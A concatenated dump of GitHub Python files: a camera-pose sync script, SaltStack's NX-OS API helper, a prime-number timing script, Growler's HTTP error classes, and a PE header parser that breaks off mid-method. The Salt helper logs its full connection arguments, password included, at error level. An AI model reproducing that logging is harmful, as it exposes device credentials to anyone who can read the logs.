line = [str(a) for a in cam_pose]\n # line = [str(a) for a in cam_poses[ip]]\n line[0] = str(i).zfill(5)\n lines.append(' '.join(line) + '\\n')\n \n dirname = os.path.dirname(out_file)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n with open(out_file, 'w') as f:\n f.writelines(lines)\n\n \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--cam_file', type=str, default='../Frames.txt')\n parser.add_argument('--pose_file', type=str, default='../ARPoses.txt')\n parser.add_argument('--out_file', type=str, default='../SyncedPoses.txt')\n args = parser.parse_args()\n sync_intrinsics_and_poses(args.cam_file, args.pose_file, args.out_file)","repo_name":"neu-vi/PlanarRecon","sub_path":"tools/sync_poses.py","file_name":"sync_poses.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":257,"dataset":"github-code","pt":"78"} +{"seq_id":"12849994854","text":"\"\"\"\nUtil functions for the NXOS API modules.\n\"\"\"\n\nimport json\nimport logging\n\nimport salt.utils.http\nfrom salt.exceptions import SaltException\nfrom salt.utils.args import clean_kwargs\n\nlog = logging.getLogger(__name__)\n\nRPC_INIT_KWARGS = [\n \"transport\",\n \"host\",\n \"username\",\n \"password\",\n \"port\",\n \"timeout\",\n \"verify\",\n \"rpc_version\",\n]\n\n\ndef _prepare_connection(**nxos_api_kwargs):\n \"\"\"\n Prepare the connection with the remote network device, and clean up the key\n value pairs, removing the args used for the connection init.\n \"\"\"\n nxos_api_kwargs = clean_kwargs(**nxos_api_kwargs)\n init_kwargs = {}\n # Clean up any arguments that are not required\n for karg, warg in nxos_api_kwargs.items():\n if karg in RPC_INIT_KWARGS:\n init_kwargs[karg] = warg\n if \"host\" not in init_kwargs:\n init_kwargs[\"host\"] = \"localhost\"\n if \"transport\" not in init_kwargs:\n init_kwargs[\"transport\"] = \"https\"\n if \"port\" not in init_kwargs:\n init_kwargs[\"port\"] = 80 if init_kwargs[\"transport\"] == \"http\" else 443\n verify = init_kwargs.get(\"verify\", True)\n if isinstance(verify, bool):\n init_kwargs[\"verify_ssl\"] = verify\n else:\n init_kwargs[\"ca_bundle\"] = verify\n if \"rpc_version\" not in init_kwargs:\n init_kwargs[\"rpc_version\"] = \"2.0\"\n if \"timeout\" not in init_kwargs:\n init_kwargs[\"timeout\"] = 60\n return init_kwargs\n\n\ndef rpc(commands, method=\"cli\", **kwargs):\n \"\"\"\n Execute an arbitrary RPC request via the Nexus API.\n\n commands\n The commands to be executed.\n\n method: ``cli``\n The type of the response, i.e., raw text (``cli_ascii``) or structured\n document (``cli``). Defaults to ``cli`` (structured data).\n\n transport: ``https``\n Specifies the type of connection transport to use. Valid values for the\n connection are ``http``, and ``https``.\n\n host: ``localhost``\n The IP address or DNS host name of the connection device.\n\n username: ``admin``\n The username to pass to the device to authenticate the NX-API connection.\n\n password\n The password to pass to the device to authenticate the NX-API connection.\n\n port\n The TCP port of the endpoint for the NX-API connection. If this keyword is\n not specified, the default value is automatically determined by the\n transport type (``80`` for ``http``, or ``443`` for ``https``).\n\n timeout: ``60``\n Time in seconds to wait for the device to respond. Default: 60 seconds.\n\n verify: ``True``\n Either a boolean, in which case it controls whether we verify the NX-API\n TLS certificate, or a string, in which case it must be a path to a CA bundle\n to use. Defaults to ``True``.\n \"\"\"\n init_args = _prepare_connection(**kwargs)\n log.error(\"These are the init args:\")\n log.error(init_args)\n url = \"{transport}://{host}:{port}/ins\".format(\n transport=init_args[\"transport\"], host=init_args[\"host\"], port=init_args[\"port\"]\n )\n headers = {\"content-type\": \"application/json-rpc\"}\n payload = []\n if not isinstance(commands, (list, tuple)):\n commands = [commands]\n for index, command in enumerate(commands):\n payload.append(\n {\n \"jsonrpc\": init_args[\"rpc_version\"],\n \"method\": method,\n \"params\": {\"cmd\": command, \"version\": 1},\n \"id\": index + 1,\n }\n )\n opts = {\"http_request_timeout\": init_args[\"timeout\"]}\n response = salt.utils.http.query(\n url,\n method=\"POST\",\n opts=opts,\n data=json.dumps(payload),\n header_dict=headers,\n decode=True,\n decode_type=\"json\",\n **init_args\n )\n if \"error\" in response:\n raise SaltException(response[\"error\"])\n response_list = response[\"dict\"]\n if isinstance(response_list, dict):\n response_list = [response_list]\n for index, command in enumerate(commands):\n response_list[index][\"command\"] = command\n return response_list\n","repo_name":"saltstack/salt","sub_path":"salt/utils/nxos_api.py","file_name":"nxos_api.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"7987370560","text":"from math import ceil\nfrom math import sqrt\nimport time\n\nstartTime=time.time()\narr=[None]*1001;\nfor i in range(1001):\n if arr[i]!=1:\n arr[i]=i\narr[1]=0;\nfor i in range(2,ceil(sqrt(1000))):\n for j in range(i+1,1001):\n if arr[i]!=0 and arr[j]!=0:\n if arr[j]%arr[i]==0:\n arr[j]=0;\nendTime=time.time()\nprint(\"筛选方法的时间是\",endTime-startTime)\n\nstartTime=time.time()\narr=[]\nfor i in range(2,1001):\n count=0\n for j in range(2,i):\n if i%j!=0:\n count+=1\n if count==i-2:\n arr.append(i);\nendTime=time.time()\nprint(\"弱智方法的时间是\",endTime-startTime)\n","repo_name":"LPLng/Grade-2","sub_path":"primeNumber.py","file_name":"primeNumber.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16145492272","text":"#\n# growler/http/errors.py\n#\n\"\"\"\nCustom Exception subclasses relating to specific http errors.\n\"\"\"\n\nimport sys\nfrom urllib.error import HTTPError as UrllibHttpError\nfrom growler.http import HttpStatus\nfrom growler.utils.metaclasses import ItemizedMeta\n\n\nclass HTTPError(UrllibHttpError, metaclass=ItemizedMeta):\n \"\"\"\n Generic HTTP Exception.\n\n Must be constructed with a code number, may be given an optional phrase.\n It is recommended to use one of the subclasses which is defined below.\n A helper function exists to get the appropriate error from a code:\n raise HTTPError.get_from_code(404)\n raise HTTPErrorNotFound()\n \"\"\"\n\n _msg = None\n code = 0\n code_to_error = dict()\n\n def __init__(self, url=None, code=None, phrase=None, msg=None, ex=None):\n \"\"\"\n Construct an http error, if code or phrase not defined, use default.\n \"\"\"\n super().__init__(url, code or self.status.value, msg or self.msg, None, None)\n self.phrase = phrase or self.msg\n self.sys_exception = ex\n self.traceback = sys.exc_info()[2]\n\n def PrintSysMessage(self, printraceback=True):\n if self.sys_exception:\n print(self.sys_exception)\n if printraceback and self.traceback:\n print(self.traceback)\n\n @classmethod\n def get_from_code(cls, code):\n \"\"\"\n A simple way of getting the Exception class of an http error from http\n error code.\n \"\"\"\n return cls.code_to_error.get(code)\n\n @property\n def msg(self):\n return self._msg or self.status.phrase\n\n @msg.setter\n def msg(self, value):\n self._msg = str(value)\n\n @classmethod\n def _getitem_(cls, key):\n if isinstance(key, int):\n # key by code\n err = cls.get_from_code(key)\n if err is not None:\n return err\n elif isinstance(key, str):\n # key by phrase\n for error in cls.code_to_error.values():\n if error.status.phrase == key:\n return error\n raise HTTPErrorInvalidHttpError\n\n\nclass HTTPErrorBadRequest(HTTPError):\n status = HttpStatus.BAD_REQUEST\n\n\nclass HTTPErrorInvalidHeader(HTTPErrorBadRequest):\n msg = \"Bad Request (Invalid Header Name)\"\n\n\nclass HTTPErrorUnauthorized(HTTPError):\n status = HttpStatus.UNAUTHORIZED\n\n\nclass HTTPErrorPaymentRequired(HTTPError):\n status = HttpStatus.PAYMENT_REQUIRED\n\n\nclass HTTPErrorForbidden(HTTPError):\n status = HttpStatus.FORBIDDEN\n\n\nclass HTTPErrorNotFound(HTTPError):\n status = HttpStatus.NOT_FOUND\n\n\nclass HTTPErrorMethodNotAllowed(HTTPError):\n status = HttpStatus.METHOD_NOT_ALLOWED\n\n\nclass HTTPErrorNotAcceptable(HTTPError):\n status = HttpStatus.NOT_ACCEPTABLE\n\n\nclass HTTPErrorProxyAuthenticationRequired(HTTPError):\n status = HttpStatus.PROXY_AUTHENTICATION_REQUIRED\n\n\nclass HTTPErrorRequestTimeout(HTTPError):\n status = HttpStatus.REQUEST_TIMEOUT\n\n\nclass HTTPErrorConflict(HTTPError):\n status = HttpStatus.CONFLICT\n\n\nclass HTTPErrorGone(HTTPError):\n status = HttpStatus.GONE\n\n\nclass HTTPErrorLengthRequired(HTTPError):\n status = HttpStatus.LENGTH_REQUIRED\n\n\nclass HTTPErrorPreconditionFailed(HTTPError):\n status = HttpStatus.PRECONDITION_FAILED\n\n\nclass HTTPErrorRequestEntityTooLarge(HTTPError):\n status = HttpStatus.REQUEST_ENTITY_TOO_LARGE\n\n\nclass HTTPErrorRequestUriTooLarge(HTTPError):\n status = HttpStatus.REQUEST_URI_TOO_LONG\n\n\nclass HTTPErrorUnsupportedMediaType(HTTPError):\n status = HttpStatus.UNSUPPORTED_MEDIA_TYPE\n\n\nclass HTTPErrorRequestedRangeNotSatisfiable(HTTPError):\n status = HttpStatus.REQUESTED_RANGE_NOT_SATISFIABLE\n\n\nclass HTTPErrorExpectationFailed(HTTPError):\n status = HttpStatus.EXPECTATION_FAILED\n\n\nclass HTTPErrorUnprocessableEntity(HTTPError):\n status = HttpStatus.UNPROCESSABLE_ENTITY\n\n\nclass HTTPErrorLocked(HTTPError):\n status = HttpStatus.LOCKED\n\n\nclass HTTPErrorFailedDependency(HTTPError):\n status = HttpStatus.FAILED_DEPENDENCY\n\n\nclass HTTPErrorUpgradeRequired(HTTPError):\n status = HttpStatus.UPGRADE_REQUIRED\n\n\nclass HTTPErrorPreconditionRequired(HTTPError):\n status = HttpStatus.PRECONDITION_REQUIRED\n\n\nclass HTTPErrorTooManyRequests(HTTPError):\n status = HttpStatus.TOO_MANY_REQUESTS\n\n\nclass HTTPErrorRequestHeaderFieldsTooLarge(HTTPError):\n status = HttpStatus.REQUEST_HEADER_FIELDS_TOO_LARGE\n\n\nclass HTTPErrorInternalServerError(HTTPError):\n status = HttpStatus.INTERNAL_SERVER_ERROR\n\n\nclass HTTPErrorInvalidHttpError(HTTPErrorInternalServerError):\n msg = \"Server attempted to raise invalid HTTP error\"\n\n\nclass HTTPErrorNotImplemented(HTTPError):\n status = HttpStatus.NOT_IMPLEMENTED\n\n\nclass HTTPErrorBadGateway(HTTPError):\n status = HttpStatus.BAD_GATEWAY\n\n\nclass HTTPErrorServiceUnavailable(HTTPError):\n status = HttpStatus.SERVICE_UNAVAILABLE\n\n\nclass HTTPErrorGatewayTimeout(HTTPError):\n status = HttpStatus.GATEWAY_TIMEOUT\n\n\nclass HTTPErrorVersionNotSupported(HTTPError):\n status = HttpStatus.HTTP_VERSION_NOT_SUPPORTED\n\n\nclass HTTPErrorVariantAlsoNegotiates(HTTPError):\n status = HttpStatus.VARIANT_ALSO_NEGOTIATES\n\n\nclass HTTPErrorInsufficientStorage(HTTPError):\n status = HttpStatus.INSUFFICIENT_STORAGE\n\n\nclass HTTPErrorLoopDetected(HTTPError):\n status = HttpStatus.LOOP_DETECTED\n\n\nclass HTTPErrorNotExtended(HTTPError):\n status = HttpStatus.NOT_EXTENDED\n\n\nclass HTTPErrorNetworkAuthenticationRequired(HTTPError):\n status = HttpStatus.NETWORK_AUTHENTICATION_REQUIRED\n\n\nHTTPError.code_to_error = {\n 400: HTTPErrorBadRequest,\n 401: HTTPErrorUnauthorized,\n 402: HTTPErrorPaymentRequired,\n 403: HTTPErrorForbidden,\n 404: HTTPErrorNotFound,\n 405: HTTPErrorMethodNotAllowed,\n 406: HTTPErrorNotAcceptable,\n 407: HTTPErrorProxyAuthenticationRequired,\n 408: HTTPErrorRequestTimeout,\n 409: HTTPErrorConflict,\n 410: HTTPErrorGone,\n 411: HTTPErrorLengthRequired,\n 412: HTTPErrorPreconditionFailed,\n 413: HTTPErrorRequestEntityTooLarge,\n 414: HTTPErrorRequestUriTooLarge,\n 415: HTTPErrorUnsupportedMediaType,\n 416: HTTPErrorRequestedRangeNotSatisfiable,\n 417: HTTPErrorExpectationFailed,\n 422: HTTPErrorUnprocessableEntity,\n 423: HTTPErrorLocked,\n 424: HTTPErrorFailedDependency,\n 426: HTTPErrorUpgradeRequired,\n 428: HTTPErrorPreconditionRequired,\n 429: HTTPErrorTooManyRequests,\n 431: HTTPErrorRequestHeaderFieldsTooLarge,\n\n 500: HTTPErrorInternalServerError,\n 501: HTTPErrorNotImplemented,\n 502: HTTPErrorBadGateway,\n 503: HTTPErrorServiceUnavailable,\n 504: HTTPErrorGatewayTimeout,\n 505: HTTPErrorVersionNotSupported,\n 506: HTTPErrorVariantAlsoNegotiates,\n 507: HTTPErrorInsufficientStorage,\n 508: HTTPErrorLoopDetected,\n 510: HTTPErrorNotExtended,\n 511: HTTPErrorNetworkAuthenticationRequired,\n}\n\n__all__ = [\n # generic error\n 'HTTPError',\n\n # -- 4XX errors\n 'HTTPErrorBadRequest',\n 'HTTPErrorUnauthorized',\n 'HTTPErrorPaymentRequired',\n 'HTTPErrorForbidden',\n 'HTTPErrorNotFound',\n 'HTTPErrorMethodNotAllowed',\n 'HTTPErrorNotAcceptable',\n 'HTTPErrorProxyAuthenticationRequired',\n 'HTTPErrorRequestTimeout',\n 'HTTPErrorConflict',\n 'HTTPErrorGone',\n 'HTTPErrorLengthRequired',\n 'HTTPErrorPreconditionFailed',\n 'HTTPErrorRequestEntityTooLarge',\n 'HTTPErrorRequestUriTooLarge',\n 'HTTPErrorUnsupportedMediaType',\n 'HTTPErrorRequestedRangeNotSatisfiable',\n 'HTTPErrorExpectationFailed',\n 'HTTPErrorUnprocessableEntity',\n 'HTTPErrorLocked',\n 'HTTPErrorFailedDependency',\n 'HTTPErrorUpgradeRequired',\n 'HTTPErrorPreconditionRequired',\n 'HTTPErrorTooManyRequests',\n 'HTTPErrorRequestHeaderFieldsTooLarge',\n\n # -- 5XX errors\n 'HTTPErrorInternalServerError',\n 'HTTPErrorNotImplemented',\n 'HTTPErrorBadGateway',\n 'HTTPErrorServiceUnavailable',\n 'HTTPErrorGatewayTimeout',\n 'HTTPErrorVersionNotSupported',\n 'HTTPErrorVariantAlsoNegotiates',\n 'HTTPErrorInsufficientStorage',\n 'HTTPErrorLoopDetected',\n 'HTTPErrorNotExtended',\n 'HTTPErrorNetworkAuthenticationRequired',\n\n # -- derived errors\n 'HTTPErrorInvalidHeader',\n 'HTTPErrorInvalidHttpError',\n]\n","repo_name":"pyGrowler/Growler","sub_path":"growler/http/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":8216,"program_lang":"python","lang":"en","doc_type":"code","stars":688,"dataset":"github-code","pt":"78"} +{"seq_id":"35674058434","text":"# header sizes\nSIZE_OF_PE = 24\nSIZE_OF_SECTION_HEADER = 40\nSIZE_OF_IMPORT_DIRECTORY = 20\n\nINDENT = 5\n\nBYTES_8 = 8\nBYTES_4 = 4\nBYTES_2 = 2\nBYTES_1 = 1\n\n#returns a underlined string with the desiered times of indentation\ndef format_string(string, indent_times):\n return '{}{}\\n{}{}\\n'.format(INDENT * indent_times * \" \", string, INDENT * indent_times * \" \", len(string) * \"=\")\n\n#gets the dll name from the data starting at the given pointer\ndef get_dll_name(rva, data, num_of_sections, pe_header_offset, opt_header_size):\n string = \"\"\n i = 0\n phis_off = RVA_to_offset(data, rva, num_of_sections, pe_header_offset, opt_header_size)\n\n while data[phis_off + i] != 0:\n string += chr(data[phis_off + i])\n i += 1\n\n return string\n\n# function that converts relative virtual address to the physical offset\ndef RVA_to_offset(data, rva, num_of_sections, pe_header_offset, opt_header_size):\n section_info = find_section(data, rva, num_of_sections, pe_header_offset, opt_header_size)\n\n return rva + section_info[1] - section_info[0]\n\n# function that determines which section does the relative virtual address fall in and returns the pointer to the start of that section\ndef find_section(data, rva, num_of_sections, pe_header_offset, opt_header_size):\n sections_pointer = pe_header_offset + SIZE_OF_PE + opt_header_size\n\n for i in range(num_of_sections):\n is_in_section = little_endian(data, sections_pointer + 12, 4) <= rva <= \\\n little_endian(data, sections_pointer + 12, 4) + little_endian(data, sections_pointer + 8, 4)\n\n if is_in_section:\n return little_endian(data, sections_pointer + 12, 4), little_endian(data, sections_pointer + 20, 4)\n\n sections_pointer += SIZE_OF_SECTION_HEADER\n\n# if anything happens that we don't want this function is called, error message is outputed and the program is stoped\ndef error_wrong_format():\n print(\"File not the right format!\")\n exit(0)\n\n# this function converts data from a file in to it's little endian representation in a form of a integer\ndef little_endian(data, pointer, size):\n return int.from_bytes(data[pointer:pointer + size], \"little\")\n\n# takes an integer that is a representation of a hex value and makes a hex value in string format padded with leading zeros to the wanted numbers of bytes\ndef add_padding_str(value, bytes):\n return '0x{0:0{1}X}'.format(value, bytes*2)\n\n# this function makes an array of tables that go to the end of the optional header\ndef return_tables(data, pointer, size):\n table_list = []\n pom_pointer = pointer\n for i in range(size):\n table_list.append(data_dir(little_endian(data, pom_pointer, 4), little_endian(data, pom_pointer + 4, 4)))\n pom_pointer += BYTES_8\n\n return table_list\n\n# takes an integer representing a hex value in little endian and returns ASCII string of it\ndef string_from_int_representation_of_hex(value):\n name_to_convert = str(hex(value)).partition(\"x\")[2]\n name = bytes.fromhex(name_to_convert).decode('utf-8')\n\n return name[::-1]\n\n# takes array of section headers and it returns them as a formatted string with all it's parts\ndef section_headers_merge(section_headers):\n output = format_string(\"Section Headers\", 0)\n\n for i in range(len(section_headers)):\n output += section_headers[i].write()\n\n return output\n\n#merges output for import direcotries\ndef imports_merge(import_direct, data, num_of_sections, pe_header_offset, opt_header_size):\n output = format_string(\"Import Table\", 0)\n\n for i in range(len(import_direct)):\n output += import_direct[i].write(data, num_of_sections, pe_header_offset, opt_header_size)\n\n output += \"\\n\"\n\n return output\n\n# array containing full names of fields of the mz header, used names of the fields in the structure and the field size in bytes\nmz_param = [\n (\"Magic\", \"magic\", 2),\n (\"Bytes on Last Page of File\", \"last_page_bytes\", 2),\n (\"Pages in File\", \"pages_in_file\", 2),\n (\"Relocations\", \"relocations\", 2),\n (\"Size of Header in Paragraphs\", \"size_of_header_in_paragraphs\", 2),\n (\"Minimum Extra Paragraphs\", \"min_extra_par\", 2),\n (\"Maximum Extra Paragraphs\", \"max_extra_par\", 2),\n (\"Initial (relative) SS\", \"initial_SS\", 2),\n (\"Initial SP\", \"initial_SP\", 2),\n (\"Checksum\", \"checksum\", 2),\n (\"Initial IP\", \"initial_IP\", 2),\n (\"Initial (relative) CS\", \"initial_CS\", 2),\n (\"Offset to Relocation Table\", \"offset_relocation\", 2),\n (\"Overlay Number\", \"overlay_num\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"OEM Identifier\", \"OEM_ident\", 2),\n (\"OEM Information\", \"OEM_info\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Reserved\", 2),\n (\"Offset to New Header\", \"new_header_offset\", 4)\n\n]\n\n# array containing full names of fields of the pe header, used names of the fields in the structure and the field size in bytes\npe_param = [\n (\"Magic\", \"magic\", 4),\n (\"Machine\", \"machine\", 2),\n (\"Number of Sections\", \"num_of_sections\", 2),\n (\"Time Date Stamp\", \"time_date_stamp\", 4),\n (\"Pointer to Symbol Table\", \"pointer_to_symbol\", 4),\n (\"Number of Symbols\", \"num_of_symbols\", 4),\n (\"Size of Optional Header\", \"size_of_opt_header\", 2),\n (\"Characteristics\", \"characteristics\", 2),\n\n]\n\n# array containing full names of fields of the optional header, used names of the fields in the structure and the field size in bytes\noptional_param = [\n (\"Magic\", \"magic\", 2),\n (\"Major Linker Version\", \"maj_link_version\", 1),\n (\"Minor Linker Version\", \"min_link_verion\", 1),\n (\"Size of Code\", \"size_of_code\", 4),\n (\"Size of Initialized Data\", \"size_init_data\", 4),\n (\"Size of Uninitialized Data\", \"size_uninit_data\", 4),\n (\"Address of Entry Point\", \"addr_entry\", 4),\n (\"Base of Code\", \"base_code\", 4),\n (\"Base of Data\", \"base_data\", 4),\n (\"Image Base\", \"image_base\", 4),\n (\"Section Alignment\", \"sect_align\", 4),\n (\"File Alignment\", \"file_align\", 4),\n (\"Major O/S Version\", \"maj_os_ver\", 2),\n (\"Minor O/S Version\", \"min_os_ver\", 2),\n (\"Major Image Version\", \"maj_img_ver\", 2),\n (\"Minor Image Version\", \"min_img_ver\", 2),\n (\"Major Subsystem Version\", \"maj_subsys_ver\", 2),\n (\"Minor Subsystem Version\", \"min_subsys_ver\", 2),\n (\"Win32 Version Value\", \"win32_ver\", 4),\n (\"Size of Image\", \"size_img\", 4),\n (\"Size of Headers\", \"size_headers\", 4),\n (\"Checksum\", \"checksum\", 4),\n (\"Subsystem\", \"subsys\", 2),\n (\"DLL Characteristics\", \"dll_char\", 2),\n (\"Size of Stack Reserve\", \"size_stack_res\", 4),\n (\"Size of Stack Commit\", \"size_stack_comm\", 4),\n (\"Size of Heap Reserve\", \"size_heap_res\", 4),\n (\"Size of Heap Commit\", \"size_heap_comm\", 4),\n (\"Loader Flags\", \"loader_flags\", 4),\n (\"Number of Data Directories\", \"num_data_dirs\", 4),\n\n]\n\n# array containing full names of fields of the section header, used names of the fields in the structure and the field size in bytes\nsection_param = [\n (\"Name\", \"name\", 8),\n (\"Virtual Size\", \"virt_size\", 4),\n (\"RVA\", \"rva\", 4),\n (\"Size of Raw Data\", \"size_raw\", 4),\n (\"Pointer to Raw Data\", \"pointer_raw\", 4),\n (\"Pointer to Relocations\", \"pointer_reloc\", 4),\n (\"Pointer to Line Numbers\", \"pointer_line_mem\", 4),\n (\"Number of Relocations\", \"num_reloc\", 2),\n (\"Number of Line Numbers\", \"num_line_num\", 2),\n (\"Characteristics\", \"characteristics\", 4)\n\n]\n\n# names of the direcories that are cointained on the end of the optional header (size for every directory is 8 bytes, 4 for the name and 4 for the size)\ndata_dir_names = [\n \"EXPORT Table\",\n \"IMPORT Table\",\n \"RESOURCE Table\",\n \"EXCEPTION Table\",\n \"CERTIFICATE Table\",\n \"BASE RELOCATION Table\",\n \"DEBUG Directory\",\n \"ARCHITECTURE SPECIFIC Data\",\n \"GLOBAL POINTER Register\",\n \"TLS Table\",\n \"LOAD CONFIG Table\",\n \"BOUND Import\",\n \"IMPORT ADRESS Table\",\n \"DELAY IMPORT Descriptor\",\n \"CLI Header\",\n \"RESERVED\"\n]\n\n#names of the atributes that are cointained in the import directory, variable names for that attributes and their size\nimport_table_names = [(\"Import Lookup Table RVA\", \"import_lookup_rva\", 4),\n (\"Time/Date Stamp\", \"stamp\", 4),\n (\"Forwarder Chain\", \"chain\", 4),\n (\"Name RVA\", \"name_rva\", 4),\n (\"Import Address Table RVA\", \"import_addr_rva\", 4),\n ]\n\n#names of the atributes that are cointained in the export directory, variable names for that attributes and their size\nexport_table_names=[(\"Characteristics\",\"characteristics\",4),\n (\"Time Date Stamp\",\"time_date_stamp\",4),\n (\"Major Version\",\"maj_version\",2),\n (\"Minor Version\",\"min_version\",2),\n (\"Name RVA\",\"name_rva\",4),\n (\"Ordinal Base\",\"ordinal_base\",4),\n (\"Number of Functions\",\"num_of_functions\",4),\n (\"Number of Names\",\"num_of_names\",4),\n (\"Address Table RVA\",\"addr_table_rva\",4),\n (\"Name Pointer Table RVA\",\"name_pointer_rva\",4),\n (\"Ordinal Table RVA\",\"ordinal_table_rva\",4)]\n\n# costum structure that consists of relative virtual address of a data directory and the size of it\n# this is used in the initialising of the optional header\nclass data_dir:\n def __init__(self, rva, size):\n self.rva = rva\n self.size = size\n\n\n# mz header structure\nclass MZ_header:\n def __init__(self, data, pointer):\n self.magic = little_endian(data, pointer, BYTES_2)\n self.last_page_bytes = little_endian(data, pointer + 2, BYTES_2)\n self.pages_in_file = little_endian(data, pointer + 4, BYTES_2)\n self.relocations = little_endian(data, pointer + 6, BYTES_2)\n self.size_of_header_in_paragraphs = little_endian(data, pointer + 8, BYTES_2)\n self.min_extra_par = little_endian(data, pointer + 10, BYTES_2)\n self.max_extra_par = little_endian(data, pointer + 12, BYTES_2)\n self.initial_SS = little_endian(data, pointer + 14, BYTES_2)\n self.initial_SP = little_endian(data, pointer + 16, BYTES_2)\n self.checksum = little_endian(data, pointer + 18, BYTES_2)\n self.initial_IP = little_endian(data, pointer + 20, BYTES_2)\n self.initial_CS = little_endian(data, pointer + 22, BYTES_2)\n self.offset_relocation = little_endian(data, pointer + 24, BYTES_2)\n self.overlay_num = little_endian(data, pointer + 26, BYTES_2)\n self.OEM_ident = little_endian(data, pointer + 38, BYTES_2)\n self.OEM_info = little_endian(data, pointer + 40, BYTES_2)\n self.new_header_offset = little_endian(data, pointer + 60, BYTES_4)\n\n # checking if the magic numbers are correct\n def check(self):\n if self.magic != int.from_bytes(b'MZ', \"little\"):\n error_wrong_format()\n\n # formatted output for every part of the mz header returned as a string\n def write(self):\n output = format_string(\"MZ HEADER\", 0)\n elements = vars(self)\n header_name = \"--> MZ\"\n reserved = '{: <5}{: <30}: {: <10}\\n'.format(\"\", \"reserved\",\n add_padding_str(0, BYTES_2))\n for i in range(14):\n name_of_atribute = mz_param[i][0]\n name_of_variable = mz_param[i][1]\n size = mz_param[i][2]\n\n if name_of_variable != \"magic\":\n header_name = \"\"\n\n output += '{: <5}{: <30}: {: <10}{}\\n'.format(\"\", name_of_atribute,\n add_padding_str(elements[name_of_variable], size),\n header_name)\n\n for i in range(4):\n output += reserved\n\n for i in range(18, 20):\n name_of_atribute = mz_param[i][0]\n name_of_variable = mz_param[i][1]\n size = mz_param[i][2]\n\n output += '{: <5}{: <30}: {: <10}\\n'.format(\"\", name_of_atribute,\n add_padding_str(elements[name_of_variable],size))\n\n for i in range(10):\n output += reserved\n\n name_of_atribute = mz_param[30][0]\n name_of_variable = mz_param[30][1]\n size = mz_param[30][2]\n output += '{: <5}{: <30}: {: <10}\\n'.format(\"\", name_of_atribute,\n add_padding_str(elements[name_of_variable], size))\n output += \"\\n\"\n\n return output\n\n\n# pe header structure\nclass PE_header:\n def __init__(self,data, pointer):\n self.magic = little_endian(data, pointer, BYTES_4)\n self.machine = little_endian(data, pointer + 4, BYTES_2)\n self.num_of_sections = little_endian(data, pointer + 6, BYTES_2)\n self.time_date_stamp = little_endian(data, pointer + 8, BYTES_4)\n self.pointer_to_symbol = little_endian(data, pointer + 12, BYTES_4)\n self.num_of_symbols = little_endian(data, pointer + 16, BYTES_4)\n self.size_of_opt_header = little_endian(data, pointer + 20, BYTES_2)\n self.characteristics = little_endian(data, pointer + 22, BYTES_2)\n\n # checking if the magic numbers are correct\n def check(self):\n if self.magic != int.from_bytes(b'\\x50\\x45\\x00\\x00', \"little\"):\n error_wrong_format()\n\n # formated output for every part of the pe header returned as a string\n def write(self):\n output = format_string(\"PE header\", 0)\n elements = vars(self)\n header_name = \"--> PE\"\n\n for i in range(len(elements)):\n name_of_atribute = pe_param[i][0]\n name_of_variable = pe_param[i][1]\n size = pe_param[i][2]\n\n if name_of_variable != \"magic\":\n header_name = \"\"\n\n output += '{: <5}{: <30}: {: <10} {}\\n'.format(\"\", name_of_atribute,\n add_padding_str(elements[name_of_variable],size),\n header_name)\n\n output += \"\\n\"\n\n return output\n\n\n# optional header structure\nclass Optional_header:\n def __init__(self, data, pointer):\n self.magic = little_endian(data, pointer, BYTES_2)\n self.maj_link_version = little_endian(data, pointer + 2, BYTES_1)\n self.min_link_verion = little_endian(data, pointer + 3, BYTES_1)\n self.size_of_code = little_endian(data, pointer + 4, BYTES_4)\n self.size_init_data = little_endian(data, pointer + 8, BYTES_4)\n self.size_uninit_data = little_endian(data, pointer + 12, BYTES_4)\n self.addr_entry = little_endian(data, pointer + 16, BYTES_4)\n self.base_code = little_endian(data, pointer + 20, BYTES_4)\n self.base_data = little_endian(data, pointer + 24, BYTES_4)\n self.image_base = little_endian(data, pointer + 28, BYTES_4)\n self.sect_align = little_endian(data, pointer + 32, BYTES_4)\n self.file_align = little_endian(data, pointer + 36, BYTES_4)\n self.maj_os_ver = little_endian(data, pointer + 40, BYTES_2)\n self.min_os_ver = little_endian(data, pointer + 42, BYTES_2)\n self.maj_img_ver = little_endian(data, pointer + 44, BYTES_2)\n self.min_img_ver = little_endian(data, pointer + 46, BYTES_2)\n self.maj_subsys_ver = little_endian(data, pointer + 48, BYTES_2)\n self.min_subsys_ver = little_endian(data, pointer + 50, BYTES_2)\n self.win32_ver = little_endian(data, pointer + 52, BYTES_4)\n self.size_img = little_endian(data, pointer + 56, BYTES_4)\n self.size_headers = little_endian(data, pointer + 60, BYTES_4)\n self.checksum = little_endian(data, pointer + 64, BYTES_4)\n self.subsys = little_endian(data, pointer + 68, BYTES_2)\n self.dll_char = little_endian(data, pointer + 70, BYTES_2)\n self.size_stack_res = little_endian(data, pointer + 72, BYTES_4)\n self.size_stack_comm = little_endian(data, pointer + 76, BYTES_4)\n self.size_heap_res = little_endian(data, pointer + 80, BYTES_4)\n self.size_heap_comm = little_endian(data, pointer + 84, BYTES_4)\n self.loader_flags = little_endian(data, pointer + 88, BYTES_4)\n self.num_data_dirs = little_endian(data, pointer + 92, BYTES_4)\n self.tables = return_tables(data, pointer + 96, self.num_data_dirs)\n\n # checking if the magic numbers are correct\n def check(self):\n if self.magic != int.from_bytes(b'\\x0B\\x01', \"little\"):\n error_wrong_format()\n\n # formatted output for every part of the optional header returned as a string\n def write(self, data, num_of_sections, pe_header_offset, opt_header_size):\n output = format_string(\"Optional header\", 0)\n phys_address = \"\"\n elements = vars(self)\n\n for i in range(len(elements) - 1):\n name_of_atribute = optional_param[i][0]\n name_of_variable = optional_param[i][1]\n size = optional_param[i][2]\n\n if name_of_variable == \"addr_entry\":\n phys_address = 